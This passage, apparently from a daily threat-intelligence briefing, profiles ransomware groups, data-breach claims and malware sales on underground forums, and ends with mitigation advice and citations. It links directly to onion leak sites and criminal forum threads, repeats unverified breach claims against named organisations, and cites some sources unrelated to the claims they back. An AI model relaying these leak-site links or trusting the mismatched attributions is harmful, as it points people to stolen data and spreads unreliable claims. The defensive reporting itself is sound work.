  • Background: “Baldwin” appears to be a malware developer and vendor operating within the cybercrime underground, specifically on the xss.is forum. Their motivation is financial, profiting from the sale of malicious software to other threat actors. The sophisticated features claimed for “Baldwin Killer” suggest a focus on creating tools that enable stealthy and persistent compromise of modern Windows environments. No further specific information on this actor was found in the provided research.
  • TTPs: The primary TTP is malware development, incorporating advanced defense evasion and persistence techniques. This includes coding capabilities for memory injection, developing or integrating exploits for UAC bypass, implementing Ring0 rootkit functionalities (which requires kernel-level programming expertise), manipulating boot processes for early startup, and leveraging DLL sideloading against trusted applications to bypass security mechanisms like SmartScreen. Marketing and selling the developed malware on underground forums is the distribution method. Providing ongoing updates or support might also be part of the offering to maintain the tool’s effectiveness against evolving defenses.
  • Targets & Motivations: The actor’s motivation is financial profit from selling the malware. The tool itself is designed to be used by other cybercriminals targeting Windows systems. Buyers would likely use “Baldwin Killer” as a payload dropper or loader for other malware (like infostealers, banking trojans, or ransomware), or as a standalone tool for establishing persistent, hidden access for espionage or data theft. The claimed features, particularly the Ring0 rootkit, early boot persistence, and broad EDR bypass, represent significant capabilities that are highly sought after by attackers aiming to defeat modern security stacks. The availability of such tools for purchase lowers the barrier for less sophisticated actors to conduct advanced attacks, contributing to the overall threat level. This commoditization of advanced malware is a key factor in the cybersecurity arms race.
  • Evidence:
  • Published URL: https://xss.is/threads/136470/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/50f7f600-a462-4cc3-98c2-3023126ccaf9.png

Incident 15: Alleged data breach of Bank EmiratesNBD

  • Victim: EmiratesNBD (Banking & Mortgage, UAE) – emiratesnbd.com
  • Details: Claimed on 2025-04-21T04:17:02Z. Category: Data Breach. Network: Openweb (xss.is forum). The threat actor “Machine1337” claims to have breached EmiratesNBD, a major bank in the UAE. The actor is offering data allegedly sourced from the bank, described as containing “real time updates” and including fields like name, country, phone number, and address.
  • Threat Actor Profile: Machine1337
  • Background: This is the same actor identified in Incident 4, claiming to sell data from IndiGo airlines. Active on the xss.is forum, potentially with a background in bug bounty hunting 13, suggesting technical skills now applied maliciously for financial gain.
  • TTPs: Likely involves exploiting vulnerabilities in the bank’s web applications, customer portals, APIs, or backend databases. Techniques could range from SQL injection to exploiting insecure APIs or using stolen credentials. Data exfiltration is the primary action, followed by advertising the stolen data for sale on underground forums. The claim of “real time updates” is notable and requires careful consideration. It could imply persistent access to a system generating live data (e.g., via a compromised API, access to streaming transaction logs, or persistent malware on a relevant server), or it could simply be exaggerated marketing language used by the seller to increase the perceived value of the data.
  • Targets & Motivations: The motivation is clearly financial. Targeting a large, prominent bank like EmiratesNBD indicates an aim to acquire high-value customer financial data. This incident, combined with the actor’s claim against IndiGo (India), may suggest a focus on large enterprises in the Middle East/South Asia region, or simply opportunistic targeting of valuable data troves. The “real time updates” claim, if genuine, suggests a more severe and ongoing compromise than a typical static database dump, potentially allowing continuous monitoring or harvesting of customer information and posing a much greater risk. Verification of this claim is critical for the affected institution.
  • Evidence:
  • Published URL: https://xss.is/threads/136468/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/deb82234-4409-4662-865b-6da3c4ff9c06.png

Incident 16: Alleged data Breach of EQUIPMENT RENTAL PLATFORM

  • Victim: Equipment Rental Platform (Business Supplies & Equipment, Brazil) – plataformalocadora.com.br
  • Details: Claimed on 2025-04-21T02:12:05Z. Category: Data Breach. Network: Telegram. The group “Vortex” claims to have breached the data of this Brazilian equipment rental platform. The claim posted on their Telegram channel is vague, simply stating they breached the “organization’s data” without specifying the type or volume.
  • Threat Actor Profile: Vortex
  • Background: This is the same group identified in Incident 3, which claimed a breach of Finkel Technologies (Israel). Vortex appears to be a data breach and extortion group operating via Telegram. Their motivation is likely financial gain from selling stolen data or extorting victims. No specific profile information is available from the provided research beyond their observed activities.
  • TTPs: Similar to the Finkel Technologies incident, Vortex likely compromises victims by exploiting vulnerabilities in web applications, APIs, or cloud infrastructure, or potentially through credential theft or misconfigurations. Their primary TTP involves accessing and exfiltrating organizational data, followed by announcing the breach on their Telegram channel.
  • Targets & Motivations: Likely financially motivated. Targeting a Brazilian equipment rental platform suggests opportunistic attacks, possibly driven by vulnerability scanning identifying weaknesses in the target’s systems. This second claim by Vortex within the same 24-hour period, targeting a different sector (Business Supplies vs. IT Services) and region (Brazil vs. Israel), indicates the group is actively pursuing multiple targets concurrently. The lack of specific detail in this claim compared to the Finkel Tech claim (which listed specific credentials) might suggest the data obtained is less sensitive, or the group has not yet fully analyzed it. Nonetheless, it confirms Vortex as an active threat actor conducting breaches across diverse geographical and industrial domains.
  • Evidence:
  • Published URL: https://t.me/Vvorttexx/20
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/68786db9-a31b-405a-9dd5-8ee341e8c829.png

Incident 18: Ardon Sologne falls victim to NightSpire Ransomware

  • Victim: Municipality of Ardon (Government Administration, France) – ardon45.fr
  • Details: Claimed on 2025-04-21T01:44:22Z. Category: Ransomware. Network: Tor. The NightSpire ransomware group has claimed an attack against the Municipality of Ardon in France. They state they have obtained 30 GB of the organization’s data and intend to publish it within 8-9 days if their demands are not met.
  • Threat Actor Profile: NightSpire
  • Background: NightSpire is a new ransomware and extortion operation that emerged in early March 2025.58 The name may reference World of Warcraft lore. Initial assessments suggest the operators might be relatively inexperienced or less sophisticated compared to established ransomware groups.58 The group appears to target victims opportunistically across all sectors. While initially potentially focusing only on data extortion, recent activity suggests a shift towards a traditional double extortion model involving data encryption as well.58 Despite being new, the group has shown activity, accounting for approximately 4% of observed ransomware incidents in one weekly report from late March 2025.59
  • TTPs: NightSpire employs double extortion tactics, exfiltrating data before potentially encrypting systems.58 Initial access methods are not definitively detailed for NightSpire specifically, but common vectors for such groups include exploiting known vulnerabilities in internet-facing systems like VPNs or firewalls (e.g., Fortinet, SonicWall vulnerabilities are often targeted by various groups 58), or compromising Remote Desktop Protocol (RDP) access. For data exfiltration, NightSpire has been observed using legitimate file transfer tools like WinSCP and MEGACmd.58 They also leverage “living off the land binaries” (LOLBins) – legitimate system tools misused for malicious purposes – to aid in defense evasion.58 The group has demonstrated aggressive pressure tactics, including imposing very short payment deadlines (as little as two days in some cases) and potentially publishing excerpts of negotiation chats if victims fail to comply.58
  • Targets & Motivations: The group is financially motivated.58 They appear to target organizations opportunistically, with victims observed across multiple industries, although manufacturing has been a frequent target (36% in one analysis).58 Thus far, the majority of their victims (73%) have been small to medium-sized businesses (SMBs) or organizations with fewer than 1,000 employees.58 Targeting a French municipality fits this pattern of opportunistic attacks, likely exploiting an identified vulnerability or weakness. The emergence and activity level of NightSpire illustrate the dynamic ransomware ecosystem where new groups continually surface. While potentially less sophisticated operationally 58, their ability to successfully exfiltrate data and extort victims poses a genuine threat, particularly to SMBs and local government entities which may have fewer security resources. Their potentially unpredictable behavior adds complexity to incident response and negotiation.58
  • Evidence:
  • Published URL: http://nspireyzmvapgiwgtuoznlafqvlyz7ey6himtgn5bdvdcowfyto3yryd.onion/datas.php
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/cefaa9f6-1ef2-4501-bdc8-9bb1ff08dba2.png

Incident 19: Michelson Realty Company LLC falls victim to Qilin Ransomware

  • Victim: Michelson Realty Company LLC (Real Estate, USA) – michelsonrealty.com
  • Details: Claimed on 2025-04-21T01:23:49Z. Category: Ransomware. Network: Tor. The Qilin ransomware group claims to have compromised Michelson Realty Company LLC, a US-based real estate firm. As is typical for the group, they claim data exfiltration and provide sample screenshots on their leak site as proof.
  • Threat Actor Profile: Qilin (aka Agenda)
  • Background & TTPs: (Refer to Incident 1 for full profile). Qilin is a likely Russian-origin RaaS group operating since July 2022, known for double extortion, high ransom demands, and using customizable Go and Rust ransomware variants.1 They gain access via phishing, exploiting external services (Fortinet VPNs) or public applications (Veeam), utilize various tools (RMM, Cobalt Strike, PsExec) and techniques (process injection, credential theft) for intrusion, persistence, lateral movement, and impact.1
  • Targets & Motivations: Qilin is financially motivated and targets organizations opportunistically across diverse global sectors.4 While real estate is not listed as a primary target sector for Qilin in some analyses 4, their opportunistic approach means any vulnerable organization with perceived ability to pay can become a victim. This attack on a US real estate company, following the earlier attack on Canadian financial services (Incident 1) within the same 24-hour period, strongly reinforces Qilin’s broad operational tempo and non-sector-specific, opportunistic targeting strategy.4 It demonstrates their capability to execute attacks across different industries and geographical regions concurrently.
  • Evidence:
  • Published URL: http://ijzn3sicrcy7guixkzjkib4ukbiilwc3xhnmby4mcbccnsd7j2rekvqd.onion/site/view?uuid=1ca89951-6a0b-3bb2-a311-0fffa85f3f81
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/31a36824-f4d3-4a18-9fa1-64f159b5f104.png

Incident 20: Alleged Data Leak of Fujita Health University

  • Victim: Fujita Health University (Hospital & Health Care, Japan) – fujita-hu.ac.jp
  • Details: Claimed on 2025-04-21T00:47:30Z. Category: Data Breach. Network: Openweb (darkforums.st). An actor using the handle “l33tfg” posted on the “darkforums.st” forum claiming to have breached Fujita Health University in Japan. The actor alleges leaking a database containing sensitive personal and institutional information, specifically mentioning university email addresses, both plaintext and hashed passwords, physical addresses, and additional data encoded in Base64 format.
  • Threat Actor Profile: l33tfg
  • Background: “l33tfg” is an actor distributing leaked data on a dark web forum. The alias is typical of hacker culture. Their motivation is likely financial (selling the data or access derived from it) or driven by a desire for notoriety within the underground community. No specific information about this actor is available in the provided research.
  • TTPs: The breach likely resulted from exploiting vulnerabilities in the university’s web applications, databases (e.g., via SQL injection), or potentially through the use of stolen credentials targeting administrative or database accounts. The actor accessed and dumped database contents containing sensitive user and institutional data. The final step involved leaking this data on a dark web forum, making it accessible to other malicious actors. The presence of plaintext passwords in the leaked data points to significantly poor security hygiene and practices within the compromised systems, such as inadequate password storage policies or the use of legacy systems without proper security controls.
  • Targets & Motivations: Likely motivated by financial gain or notoriety. Targeting a Japanese health university provides access to a wealth of potentially sensitive data, including Personal Identifiable Information (PII) of students, faculty, and possibly patients, as well as potentially valuable research data. The healthcare and education sectors are frequent targets for cyberattacks due to the value of their data and sometimes lagging security investments.3 The leak of such data, especially plaintext passwords, poses severe risks including identity theft, targeted phishing, financial fraud, and significant reputational damage to the university. It highlights the critical importance of robust security measures, particularly strong password hashing, vulnerability management, and strict access controls, in sectors handling sensitive information.
  • Evidence:
  • Published URL: https://darkforums.st/Thread-fujita-hu-ac-jp-DATA-LEAK
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/0fef252d-892b-4282-a46a-9fa47f620aef.png

Incident 22: Alleged Sale of Mega Account Checker Tool

  • Victim: N/A (Malware/Tool Sale)
  • Details: Claimed on 2025-04-21T00:17:56Z. Category: Malware. Network: Openweb (exploit.in forum). An actor named “CloudByte” is advertising a tool called “Mega Checker Pro” for sale on the exploit.in forum. This tool is described as a multifunctional checker for accounts on the Mega.nz file hosting service. Claimed features include support for multithreading (for speed), proxy configurations (for evasion and bypassing rate limits), keyword searches within accounts, file upload capabilities, and detailed logging. The tool is marketed as user-friendly and a competitor to similar checkers, with offers of free updates and installation assistance.
  • Threat Actor Profile: CloudByte
  • Background: “CloudByte” appears to be a software developer and vendor specializing in credential checking tools, operating on the exploit.in underground forum. Their motivation is financial gain through the sale of these specialized tools. This particular tool targets the popular Mega.nz cloud storage service. No further specific information on this actor was found.
  • TTPs: The primary TTP is software development, specifically creating automated tools for credential verification. The checker tool likely interacts with Mega.nz’s API or web login interface to test large lists of username/password combinations (often sourced from previous data breaches, known as “combo lists”). Features like multithreading and proxy support are standard for enabling large-scale, efficient checking while attempting to avoid detection or blocking by the targeted service. Marketing and selling the tool on underground forums is the distribution method.
  • Targets & Motivations: The actor is financially motivated by the sale of the tool. The tool itself enables other cybercriminals to perform large-scale Account Takeover (ATO) attacks against Mega.nz users. Buyers purchase the tool to identify valid Mega accounts within large credential lists. Compromised Mega accounts are valuable to criminals for various purposes: accessing sensitive personal or corporate files stored by legitimate users, hosting and distributing illegal content (e.g., malware, stolen data), or potentially using the storage as part of command-and-control infrastructure. The existence and sale of such specialized checkers for popular online services like Mega underscores the thriving underground economy that supports ATO activities and the abuse of legitimate platforms for illicit purposes.
  • Evidence:
  • Published URL: https://forum.exploit.in/topic/257775/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/17a83691-20dc-4085-9472-c3ef4c8d806d.png

4. Threat Actor Spotlight

This section provides a consolidated overview of the key threat actors observed in today’s reporting period, summarizing their characteristics, common TTPs, and potential implications.

  • Qilin (Agenda):
  • Summary: A highly active RaaS operation, likely of Russian origin, employing double extortion tactics since July 2022.4 Qilin is recognized for its sophisticated ransomware, available in both Go and Rust variants, enabling customization by affiliates.2 The group demands high ransoms and targets a diverse range of global sectors opportunistically.2 Two incidents involving Qilin were reported today, targeting financial services in Canada and real estate in the US.
  • Key TTPs: Initial access is commonly gained via phishing or exploiting vulnerabilities in external services (e.g., Fortinet VPNs, Veeam software).1 Post-compromise activities involve the use of RMM tools, Cobalt Strike 4, lateral movement via PsExec/SSH 2, process injection for evasion 5, and disabling defenses and deleting backups/shadow copies.1 Encryption utilizes AES/ChaCha20/RSA.2 Key MITRE ATT&CK TTPs include T1133 (External Remote Services), T1190 (Exploit Public-Facing Application), T1566 (Phishing), T1059 (Command and Scripting Interpreter), T1055 (Process Injection), T1078 (Valid Accounts), T1112 (Modify Registry), T1484 (Group Policy Modification), T1562.001 (Impair Defenses: Disable or Modify Tools), T1490 (Inhibit System Recovery), T1486 (Data Encrypted for Impact).
  • Implications: Qilin remains a significant global threat due to the scalability of its RaaS model, the advanced capabilities of its ransomware (particularly the Rust variant), and its broad, opportunistic targeting strategy. Defending against Qilin requires robust vulnerability management, effective anti-phishing controls, comprehensive EDR monitoring, and reliable backup solutions.
  • Hunters International:
  • Summary: A RaaS group that emerged in late 2023, exhibiting strong operational and code similarities to the defunct Hive ransomware group, suggesting a potential rebrand or succession.26 Hunters International places a primary emphasis on data exfiltration, often employing double extortion but sometimes foregoing encryption altogether.28 They utilize Rust-based ransomware and custom tools like the SharpRhino backdoor and Storage Software.26 Reports suggested a potential rebranding to “World Leaks” in early 2025, focusing solely on data extortion.28 Today, they were observed targeting a healthcare organization in Belgium.
  • Key TTPs: Initial access vectors include exploiting vulnerabilities (e.g., Oracle WebLogic, Citrix Bleed, Fortinet flaws) 27, compromising RDP/VPN access 19, and phishing.31 Lateral movement is achieved using RDP, RMM tools (AnyDesk, TeamViewer), Plink, and Impacket.27 Credential theft involves Mimikatz and dumping registry hives.19 Data exfiltration frequently targets cloud storage services like MEGA.27 They actively disable backup mechanisms.26 Key MITRE ATT&CK TTPs include T1190 (Exploit Public-Facing Application), T1133 (External Remote Services), T1566 (Phishing), T1078 (Valid Accounts), T1003 (OS Credential Dumping), T1021.001 (Remote Desktop Protocol), T1219 (Remote Access Software), T1570 (Lateral Tool Transfer), T1567.002 (Exfiltration Over Web Service: Exfiltration to Cloud Storage), T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery).
  • Implications: Hunters International represents an adaptable and potent threat, leveraging the value of stolen data as its primary extortion tool. Their potential connection to the experienced Hive operators suggests significant capability. Defenses must prioritize vulnerability management, monitor for unauthorized RMM tool usage, and implement robust detection for large data outflows, particularly to cloud platforms.
  • LockBit 3.0:
  • Summary: Historically one of the most dominant RaaS operations, LockBit suffered a major disruption through Operation Cronos in February 2024, which dismantled infrastructure and identified leadership.40 Despite this, attacks attributed to LockBit 3.0 continue, likely facilitated by the decentralized affiliate structure, remaining operational infrastructure, or the use of the LockBit 3.0 builder that was leaked in 2022.35 An attack targeting an Italian wholesale company was reported today.
  • Key TTPs: The LockBit RaaS model relies on affiliates for intrusions.39 Common initial access methods include RDP compromise, phishing, and exploiting known vulnerabilities.34 Post-exploitation often involves tools like Cobalt Strike, Mimikatz, and PsExec.34 The LockBit 3.0 ransomware features anti-analysis techniques (password protection, language checks) 36 and actively works to hinder recovery by deleting shadow copies and logs.34 The operation employs double or triple extortion models.37 Key MITRE ATT&CK TTPs include T1133, T1566, T1190, T1078, T1059, T1003, T1021, T1570, T1486, T1490, T1070 (Indicator Removal on Host), T1562 (Impair Defenses).
  • Implications: The persistence of LockBit 3.0 attacks highlights the resilience of the RaaS ecosystem. Even significant law enforcement actions may not fully eradicate a threat when its tools (like the leaked builder) become publicly available. Organizations must continue to defend against LockBit’s known TTPs, recognizing that attribution to the original core group is now complex.
  • Emerging Ransomware (Sarcoma, NightSpire):
  • Summary: Sarcoma (emerged late 2023/Oct 2024) 19 and NightSpire (emerged Mar 2025) 58 represent newer ransomware operations that have quickly accumulated victims. Both utilize double extortion tactics. Today, Sarcoma targeted a civil engineering firm in Brazil, while NightSpire hit a French municipality.
  • Key TTPs: These groups likely gain access via common methods like vulnerability exploitation and phishing.21 They have been observed using legitimate tools (WinSCP, MEGACmd) and LOLBins for defense evasion and data exfiltration.58 They may employ aggressive pressure tactics during extortion.58
  • Implications: The rapid emergence and scaling of groups like Sarcoma and NightSpire demonstrate the relatively low barrier to entry and the dynamic nature of the current RaaS landscape.22 Even groups assessed as potentially less sophisticated 58 can inflict significant damage through data theft and extortion, posing threats particularly to organizations with limited security resources. Continuous monitoring for new threat actor activity is essential.
  • Hacktivist Groups (Anonymous Italia, Cyber ​​shade unit, R00TK1T):
  • Summary: Anonymous Italia continued its campaign of defacements against Russian websites [Incidents 13, 17, 21], consistent with its established anti-invasion stance.45 Cyber ​​shade unit made bold claims of deep system compromise and disruption against diverse targets in the UAE, Ukraine, and India. R00TK1T ISC CYBER TEAM claimed a significant data breach against the major drone manufacturer DJI.33
  • Key TTPs: Activities range from lower-sophistication defacement and DDoS attacks (Anonymous Italia) 45 to potentially more advanced intrusions involving vulnerability exploitation and data theft, as claimed by Cyber ​​shade unit and R00TK1T. Communication and claims are primarily disseminated via Telegram and dark web forums.
  • Implications: Geopolitical conflicts and tensions remain a significant driver for hacktivist activity.57 While many hacktivist attacks are primarily disruptive or aimed at propaganda, the claims made by groups like Cyber ​​shade unit and R00TK1T, if accurate, suggest a potential blurring of lines with more capable cybercrime or state-sponsored operations.54 Organizations may become targets based on nationality, perceived political alignment, or symbolic value, requiring awareness of politically motivated threats alongside financially driven ones.

5. Emerging Threats & Trends

Analysis of the incidents reported over the past 24 hours reveals several key trends and emerging threats shaping the current cybersecurity landscape:

  • RaaS Ecosystem Resilience and Evolution: Despite significant law enforcement successes, such as the disruption of LockBit 41, the Ransomware-as-a-Service (RaaS) model demonstrates remarkable resilience. The continued activity of LockBit 3.0 affiliates or users of its leaked builder 35, the emergence of potent new groups like Sarcoma 19 and NightSpire 58, and the rapid rise of operations like RansomHub (often absorbing affiliates from defunct groups like BlackCat 19) illustrate this adaptability. The cybercrime ecosystem readily adjusts, with affiliates migrating between platforms 63 and new groups leveraging leaked source code 22 or purchased codebases 63 to quickly establish operations. This indicates that disrupting individual groups, while impactful, does not dismantle the underlying business model that fuels ransomware proliferation.
  • Data Exfiltration as the Primary Extortion Lever: A clear trend observed across multiple ransomware groups (Qilin 5, Hunters International 28, LockBit 3.0 37, Sarcoma 20, NightSpire 58) is the prioritization of data exfiltration as part of a double or triple extortion strategy. Some groups, like Hunters International, may even forgo encryption entirely in certain cases, relying solely on the threat of leaking stolen data.26 This strategic shift likely reflects attackers’ calculation that the threat of data exposure—with its associated regulatory fines, reputational damage, and operational disruption—can be as, or even more, effective than holding systems hostage via encryption, particularly if victims have implemented robust backup strategies. This necessitates a stronger defensive focus on preventing, detecting, and responding to data exfiltration attempts, including monitoring for large data transfers to cloud storage services.27
  • Thriving Initial Access Broker (IAB) Market: The incidents involving the sale of SMTP access (b1gb0y75) and compromised e-commerce site access (Clawson) highlight the continued activity and importance of the IAB market. These brokers specialize in gaining initial footholds into organizations and selling that access to other threat actors, who then carry out subsequent attacks like ransomware deployment, BEC scams, or espionage. This specialization lowers the barrier to entry for sophisticated attacks, as ransomware affiliates or other criminals can simply purchase access rather than needing the skills and resources to achieve the initial breach themselves. Securing common entry points like RDP, VPNs, email systems, and web applications remains critical to disrupting this supply chain.
  • Commoditization of Advanced Malware and Tools: The sale of tools like “Baldwin Killer” [Incident 14], claiming advanced EDR/AV evasion, rootkit capabilities, and stealth features, alongside credential checkers like “Mega Checker Pro” [Incident 22], demonstrates the ongoing commoditization of sophisticated attack tools on underground forums. This availability means advanced TTPs, once the domain of highly skilled actors, can be purchased and utilized by a wider range of cybercriminals. This accelerates the arms race, forcing defenders to move beyond signature-based detection towards more advanced behavioral analysis and endpoint protection strategies capable of identifying the misuse of legitimate tools or novel evasion techniques.44
  • Geopolitically Motivated Hacktivism: The persistent anti-Russia defacement campaign by Anonymous Italia [Incidents 13, 17, 21] and the potentially politically motivated claims by Cyber ​​shade unit (targeting Ukraine, among others) and R00TK1T (targeting a major Chinese firm) underscore the link between real-world geopolitical events and cyber activity.45 Hacktivist groups continue to use cyberattacks as a form of protest, propaganda, or disruption. While often employing less sophisticated methods like DDoS or defacement, the potential for more significant impact exists, and organizations can become targets based purely on their nationality or perceived affiliations, regardless of their direct involvement in conflicts.

6. Mitigation Recommendations

Based on the observed TTPs and prevailing threats, organizations should prioritize the following mitigation strategies:

  • Prioritize Vulnerability Management: Aggressively patch known exploited vulnerabilities, particularly those affecting internet-facing systems, VPN gateways (e.g., Fortinet 2), backup solutions (e.g., Veeam 2), web servers (e.g., Oracle WebLogic 27), and other software frequently targeted by ransomware actors like Qilin, Hunters International, and LockBit affiliates.31 Implement a robust scanning and patching program with risk-based prioritization.
  • Secure Remote Access: Mandate the use of strong, unique passwords combined with phishing-resistant Multi-Factor Authentication (MFA) for all remote access solutions (RDP, VPNs), cloud services, email accounts, and administrative interfaces.37 Minimize the exposure of RDP and other management ports to the public internet.43 Continuously monitor for anomalous login activities and brute-force attempts.
  • Enhance Email Security: Deploy advanced email security solutions capable of detecting and blocking sophisticated phishing attempts, malicious attachments, and malicious links.1 Conduct regular security awareness training to educate users on identifying and reporting phishing emails and social engineering tactics.1 Secure SMTP configurations to prevent unauthorized relay or abuse (relevant to Incident 2).
  • Endpoint Detection and Response (EDR): Implement and properly configure EDR solutions with behavioral detection capabilities. Ensure they can detect and block common ransomware TTPs, including the execution of suspicious scripts (PowerShell), credential dumping tools (Mimikatz) 19, lateral movement techniques (PsExec, RMM abuse 4), and attempts to tamper with security software or system recovery mechanisms.34 Monitor for unusual process chains (e.g., java.exe spawning cmd.exe 27) and enable anti-ransomware specific features.34
  • Data Backup and Recovery: Maintain a comprehensive backup strategy with regular, tested backups stored offline or in immutable storage, segregated from the primary network.1 Monitor for activities indicative of backup tampering, such as attempts to delete Volume Shadow Copies using vssadmin.exe.2
  • Network Segmentation and Least Privilege: Implement network segmentation to limit the blast radius of a potential compromise and hinder lateral movement.43 Enforce the principle of least privilege for user accounts and service permissions to restrict attacker access to sensitive systems and data.43
  • Monitor for Data Exfiltration: Deploy Data Loss Prevention (DLP) tools and actively monitor network traffic for signs of large-scale data exfiltration, paying particular attention to outbound connections to known cloud storage platforms (e.g., MEGA 27), file sharing sites, or unusual IP addresses. Analyze traffic volumes and patterns for anomalies.
  • Leverage Threat Intelligence: Stay informed about the latest TTPs, IoCs, and targeted vulnerabilities associated with active threat actors like Qilin, Hunters International, LockBit, Sarcoma, NightSpire, and emerging groups.1 Utilize threat intelligence feeds to enrich security alerts and proactively hunt for threats within the environment. Monitor dark web forums and public breach notification channels for mentions related to your organization or supply chain partners.
  • Maintain and Test Incident Response Plan: Ensure a comprehensive incident response plan is documented, regularly updated, and tested through tabletop exercises or simulations. This plan should outline clear steps for containment, eradication, recovery, and communication in the event of a ransomware attack or major data breach.

Works cited

  1. Threat Briefing: Understanding and Defending Against Russian Ransomware Group Qilin, accessed April 21, 2025, https://adarma.com/blog/russian-ransomware-group-qilin/
  2. Qilin Ransomware: Exposing the TTPs Behind One of the Most …, accessed April 21, 2025, https://www.picussecurity.com/resource/blog/qilin-ransomware
  3. Qilin Ransomware: What You Need To Know – Tripwire, accessed April 21, 2025, https://www.tripwire.com/state-of-security/qilin-ransomware-what-you-need-know
  4. qilin-threat-profile-tlpclear.pdf – HHS.gov, accessed April 21, 2025, https://www.hhs.gov/sites/default/files/qilin-threat-profile-tlpclear.pdf
  5. Threat Actor Profile: Qilin Ransomware Group – Cyble, accessed April 21, 2025, https://cyble.com/threat-actor-profiles/qilin-ransomware-group/
  6. Vulnerability Vortex: Escaping the Whirlpool of Ineffective Security | Rapid7 Blog, accessed April 21, 2025, https://www.rapid7.com/blog/post/2025/01/24/the-vulnerability-vortex-escaping-the-whirlpool-of-ineffective-security/
  7. Escaping the Vulnerability Vortex: Securing Code for a Safer Tomorrow – CloudDefense.AI, accessed April 21, 2025, https://www.clouddefense.ai/escape-the-vulnerability-vortex/
  8. Navigating the Cybersecurity Landscape: The Importance of CVE, CVSS, and MITRE ATT&CK for IT Professionals – IT Vortex, accessed April 21, 2025, https://www.theitvortex.com/navigating-the-cybersecurity-landscape-the-importance-of-cve-cvss-and-mitre-attck-for-it-professionals/
  9. VORTEX Cybersecurity, accessed April 21, 2025, https://www.vortexcloud.com/platform/cybersecurity
  10. CrowdStrike Threat Landscape: APTs & Adversary Groups, accessed April 21, 2025, https://www.crowdstrike.com/adversaries/
  11. Vortex of Conflict: U.S. Policy Toward Afghanistan, Pakistan, and Iraq 9780804777490, accessed April 21, 2025, https://dokumen.pub/vortex-of-conflict-us-policy-toward-afghanistan-pakistan-and-iraq-9780804777490.html
  12. Saudi Arabia: Modernity, Stability, and the Twenty-First Century Monarchy – DTIC, accessed April 21, 2025, https://apps.dtic.mil/sti/tr/pdf/ADA620023.pdf
  13. machine1337/machine1337 – GitHub, accessed April 21, 2025, https://github.com/machine1337/machine1337
  14. Threat Actor Profile: ScarCruft / APT37 – SOCRadar® Cyber Intelligence Inc., accessed April 21, 2025, https://socradar.io/threat-actor-profile-scarcruft-apt37/
  15. Threat Actor Profiles – Cyble, accessed April 21, 2025, https://cyble.com/threat-actor-profiles/
  16. Threat Actor Profiles – SOCRadar® Cyber Intelligence Inc., accessed April 21, 2025, https://socradar.io/category/threat-actor-profiles/
  17. The Threat Actor Profile Guide for CTI Analysts.txt – GitHub, accessed April 21, 2025, https://github.com/curated-intel/Threat-Actor-Profile-Guide/blob/main/The%20Threat%20Actor%20Profile%20%20Guide%20for%20CTI%20Analysts.txt
  18. Threat Research Report: How AI Assistants, Co-Pilots, and Chatbots Create New Cyber Threats – MixMode AI, accessed April 21, 2025, https://mixmode.ai/blog/threat-research-report-how-ai-assistants-co-pilots-and-chatbots-create-new-cyber-threats/
  19. Last Year in Ransomware: Top Ransomware Groups and Emerging Threat Actors – Halcyon, accessed April 21, 2025, https://www.halcyon.ai/blog/last-year-in-ransomware-top-ransomware-groups-and-emerging-threat-actors
  20. Weekly Intelligence Report – 18 Apr 2025 – cyfirma, accessed April 21, 2025, https://www.cyfirma.com/news/weekly-intelligence-report-18-apr-2025/
  21. Unimicron Purportedly Subjected to Sarcoma Ransomware Attack | MSSP Alert, accessed April 21, 2025, https://www.msspalert.com/brief/unimicron-purportedly-subjected-to-sarcoma-ransomware-attack
  22. Dragos Industrial Ransomware Analysis: Q4 2024, accessed April 21, 2025, https://www.dragos.com/blog/dragos-industrial-ransomware-analysis-q4-2024/
  23. Sarcoma Ransomware Exploits Zero-Day Vulnerability in Smart Media Group Bulgaria’s Network – Rescana, accessed April 21, 2025, https://www.rescana.com/post/sarcoma-ransomware-exploits-zero-day-vulnerability-in-smart-media-group-bulgaria-s-network
  24. Weekly Top 10: 02.17.2025: DragonRank Seen Exploiting IIS Servers Across Asia; PostgreSQL Vulnerabilities Used to Breach BeyondTrust; Sarcoma Ransomware Operation Breached Unimicron, and More. – Innovate Cybersecurity | Threat Advisory, News, and Events, accessed April 21, 2025, https://innovatecybersecurity.com/security-threat-advisory/weekly-top-10-02-17-2025-dragonrank-seen-exploiting-iis-servers-across-asia-postgresql-vulnerabilities-used-to-breach-beyondtrust-sarcoma-ransomware-operation-breached-unimicron-and-more/
  25. Weekly Intelligence Report – 11 Apr 2025 – cyfirma, accessed April 21, 2025, https://www.cyfirma.com/news/weekly-intelligence-report-11-apr-2025/
  26. Hunters International Ransomware – Blackpoint, accessed April 21, 2025, https://blackpointcyber.com/threat-profile/hunters-international-ransomware/
  27. Hunters International Ransomware: Tactics, Impact, and Defense Strategies – Picus Security, accessed April 21, 2025, https://www.picussecurity.com/resource/blog/hunters-international-ransomware
  28. The beginning of the end: the story of Hunters International | Group …, accessed April 21, 2025, https://www.group-ib.com/blog/hunters-international-ransomware-group/
  29. Hunters International Ransomware – Blackpoint Cyber, accessed April 21, 2025, https://blackpointcyber.com/wp-content/uploads/2024/10/Hunters-International.pdf
  30. Threat Profile: Hunters International Ransomware Group – Adarma, accessed April 21, 2025, https://adarma.com/blog/hunters-ransomware-group/
  31. Hunters International: A Deep Dive Into The Evolution Of A Stealthy Ransomware Group, accessed April 21, 2025, https://www.ampcuscyber.com/shadowopsintel/hunters-international-a-deep-dive-into-the-evolution-of-a-stealthy-ransomware-group/
  32. Hunters International Ransomware: What We Learned – Forescout, accessed April 21, 2025, https://www.forescout.com/blog/hunters-international-ransomware-what-we-learned-from-an-oracle-ws-attack/
  33. Daily Drop (695): John Deere: Starlink, UK: Cyber Abroad, UNODC, accessed April 21, 2025, https://substack.com/home/post/p-140729626?utm_campaign=post&utm_medium=web
  34. THREAT ANALYSIS: Assemble LockBit 3.0 – Cybereason, accessed April 21, 2025, https://www.cybereason.com/blog/threat-analysis-assemble-lockbit-3
  35. LockBit in Focus: Ransomware, Cyber Attacks, and Takedowns – CybelAngel, accessed April 21, 2025, https://cybelangel.com/lockbit-cybercriminal-guide/
  36. Lockbit 3.0 Analysis: How to Enhance Ransomware Protection, accessed April 21, 2025, https://www.txone.com/blog/malware-analysis-lockbit-3-0/
